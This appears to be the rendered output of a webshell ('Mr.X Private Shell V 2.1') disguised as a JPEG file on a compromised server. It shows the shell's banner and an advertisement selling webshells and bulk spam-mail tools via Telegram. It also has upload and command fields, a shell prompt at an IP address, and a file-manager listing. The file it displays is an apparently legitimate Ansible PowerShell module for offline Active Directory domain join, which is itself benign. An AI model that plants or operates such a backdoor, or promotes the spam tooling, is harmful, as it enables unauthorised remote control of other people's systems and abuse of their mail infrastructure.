����JFIF��������� Mr.X
  
  __  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

deexcl@216.73.217.71: ~ $
#!powershell

# Copyright (c) 2022 Ansible Project
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)

#AnsibleRequires -CSharpUtil Ansible.Basic
#AnsibleRequires -PowerShell Ansible.ModuleUtils.AddType

$spec = @{
    options = @{
        blob_path = @{
            type = 'str'
        }
        domain_server = @{
            type = 'str'
        }
        identity = @{
            type = 'str'
        }
        name = @{
            type = 'str'
        }
        path = @{
            type = 'str'
        }
        provision_root_ca_certs = @{
            type = 'bool'
            default = $false
        }
    }
    mutually_exclusive = @(
        , @('identity', 'name')
    )
    required_one_of = @(
        , @('identity', 'name')
    )
    supports_check_mode = $true
}
$module = [Ansible.Basic.AnsibleModule]::Create($args, $spec)

$adParams = @{}
if ($module.Params.domain_server) {
    $adParams.Server = $module.Params.domain_server
}

$module.Result.blob = $null

Add-CSharpType -AnsibleModule $module -References @'
using System;
using System.ComponentModel;
using System.Runtime.InteropServices;

namespace microsoft.ad.domain_join
{
    [StructLayout(LayoutKind.Sequential)]
    internal struct NETSETUP_PROVISIONING_PARAMS
    {
        internal const int NETSETUP_PROVISIONING_PARAMS_CURRENT_VERSION = 0x00000001;

        public int dwVersion;
        [MarshalAs(UnmanagedType.LPWStr)]
        public string lpDomain;
        [MarshalAs(UnmanagedType.LPWStr)]
        public string lpHostName;
        [MarshalAs(UnmanagedType.LPWStr)]
        public string lpMachineAccountOU;
        [MarshalAs(UnmanagedType.LPWStr)]
        public string lpDCName;
        public int dwProvisionOptions;
        public IntPtr aCertTemplateNames;
        public int cCertTemplateNames;
        public IntPtr aMachinePolicyNames;
        public int cMachinePolicyNames;
        public IntPtr aMachinePolicyPaths;
        public int cMachinePolicyPaths;
        public IntPtr lpNetbiosName;
        public IntPtr lpSiteName;
        public IntPtr lpPrimaryDNSDomain;
    }

    [Flags]
    public enum ProvisionOptions
    {
        NETSETUP_PROVISION_DOWNLEVEL_PRIV_SUPPORT = 0x00000001,
        NETSETUP_PROVISION_REUSE_ACCOUNT = 0x00000002,
        NETSETUP_PROVISION_USE_DEFAULT_PASSWORD = 0x00000004,
        NETSETUP_PROVISION_SKIP_ACCOUNT_SEARCH = 0x00000008,
        NETSETUP_PROVISION_ROOT_CA_CERTS = 0x00000010,
        NETSETUP_PROVISION_PERSISTENTSITE = 0x00000020,
    }

    public static class Native
    {
        [DllImport("Netapi32.dll", EntryPoint = "NetCreateProvisioningPackage")]
        private static extern int NativeNetCreateProvisioningPackage(
            ref NETSETUP_PROVISIONING_PARAMS pProvisioningParams,
            ref IntPtr ppPackageBinData,
            out int ppdwPackageBinDataSize,
            IntPtr ppPackageTextData);

        public static byte[] NetCreateProvisioningPackage(string domain, string hostName, string machineAccountOU,
            string dcName, ProvisionOptions options)
        {
            domain = String.IsNullOrWhiteSpace(domain) ? null : domain;
            hostName = String.IsNullOrWhiteSpace(hostName) ? null : hostName;
            machineAccountOU = String.IsNullOrWhiteSpace(machineAccountOU) ? null : machineAccountOU;
            dcName = String.IsNullOrWhiteSpace(dcName) ? null : dcName;

            NETSETUP_PROVISIONING_PARAMS p = new NETSETUP_PROVISIONING_PARAMS()
            {
                dwVersion = NETSETUP_PROVISIONING_PARAMS.NETSETUP_PROVISIONING_PARAMS_CURRENT_VERSION,
                lpDomain = domain,
                lpHostName = hostName,
                lpMachineAccountOU = machineAccountOU,
                lpDCName = dcName,
                dwProvisionOptions = (int)options,
            };

            IntPtr outBuffer = IntPtr.Zero;
            int outBufferLength = 0;
            int res = NativeNetCreateProvisioningPackage(ref p, ref outBuffer, out outBufferLength, IntPtr.Zero);
            if (res != 0)
            {
                throw new Win32Exception(res);
            }

            byte[] data = new byte[outBufferLength];
            Marshal.Copy(outBuffer, data, 0, data.Length);

            return data;
        }
    }
}
'@

$identity = if ($module.Params.identity) {
    $module.Params.identity
}
else {
    $path = $module.Params.path
    if (-not $path) {
        $GUID_COMPUTERS_CONTAINER_W = 'AA312825768811D1ADED00C04FD8D5CD'
        $defaultNamingContext = (Get-ADRootDSE @adParams -Properties defaultNamingContext).defaultNamingContext

        $path = Get-ADObject @ADParams -Identity $defaultNamingContext -Properties wellKnownObjects |
            Select-Object -ExpandProperty wellKnownObjects |
            Where-Object { $_.StartsWith("B:32:$($GUID_COMPUTERS_CONTAINER_W):") } |
            ForEach-Object Substring 38
    }

    "CN=$($Module.Params.name -replace ',', '\,'),$path"
}

try {
    $computer = Get-ADComputer -Identity $identity @adParams
}
catch [Microsoft.ActiveDirectory.Management.ADIdentityNotFoundException] {
    $msg = "Failed to find domain computer account '$identity': $($_.Exception.Message)"
    $module.FailJson($msg, $_)
}


# The name expected by NetCreateProvisioningPackage is the sAMAccountName but
# without the trailing $.
$computerName = $computer.SamAccountName.Substring(0,
    $computer.SamAccountName.Length - 1)
$computerPath = @($computerName.DistinguishedName -split '[^\\],', 2)[-1]

$flags = [microsoft.ad.domain_join.ProvisionOptions]::NETSETUP_PROVISION_REUSE_ACCOUNT
if ($module.Params.provision_root_ca_certs) {
    $flags = $flags -bor [microsoft.ad.domain_join.ProvisionOptions]::NETSETUP_PROVISION_ROOT_CA_CERTS
}

$domainInfo = Get-ADDomain @adParams

if ($module.Params.blob_path -and (Test-Path -LiteralPath $module.Params.blob_path)) {
    $module.ExitJson()
}

if (-not $Module.CheckMode) {
    $blob = [microsoft.ad.domain_join.Native]::NetCreateProvisioningPackage(
        $domainInfo.DNSRoot,
        $computerName,
        $computerPath,
        $adParams.Server,
        $flags)
}
else {
    $blob = New-Object -TypeName System.Byte[] -ArgumentList 0
}

$module.Result.changed = $true

if ($module.Params.blob_path) {
    if (-not $Module.CheckMode) {
        [System.IO.File]::WriteAllBytes($module.Params.blob_path, $blob)
    }
}
else {
    $module.Result.blob = [System.Convert]::ToBase64String($blob)
}

$module.ExitJson()

Filemanager

Name Type Size Permission Actions
__pycache__ Folder 0755
computer.ps1 File 7.18 KB 0644
computer.py File 9.35 KB 0644
debug_ldap_client.py File 6.15 KB 0644
domain.ps1 File 6.91 KB 0644
domain.py File 5.4 KB 0644
domain_controller.ps1 File 10.2 KB 0644
domain_controller.py File 6.49 KB 0644
group.ps1 File 8.13 KB 0644
group.py File 6.57 KB 0644
membership.ps1 File 8.1 KB 0644
membership.py File 4.99 KB 0644
object.ps1 File 1.21 KB 0644
object.py File 4.08 KB 0644
object_info.ps1 File 11.58 KB 0644
object_info.py File 7.3 KB 0644
offline_join.ps1 File 6.33 KB 0644
offline_join.py File 4.57 KB 0644
ou.ps1 File 1.19 KB 0644
ou.py File 3.8 KB 0644
user.ps1 File 15.67 KB 0644
user.py File 13.25 KB 0644